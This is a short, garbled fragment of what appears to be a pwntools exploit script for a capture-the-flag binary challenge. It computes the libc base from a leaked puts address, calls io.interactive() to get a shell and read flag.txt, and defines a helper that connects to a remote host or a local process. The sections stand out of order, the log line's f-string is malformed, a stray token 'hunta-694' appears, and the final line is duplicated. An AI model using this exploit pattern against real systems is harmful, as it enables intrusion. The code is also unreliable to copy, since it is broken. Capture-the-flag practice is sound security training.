# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)')
# ---- Get the flag ------------------------------------------------- io.interactive() # should drop you into a shell; cat flag.txt hunta-694
# ---------------------------------------------------------------------- # Helper functions # ---------------------------------------------------------------------- def start(): if HOST and PORT: return remote(HOST, PORT) else: return process(BINARY) PORT) else: return process(BINARY)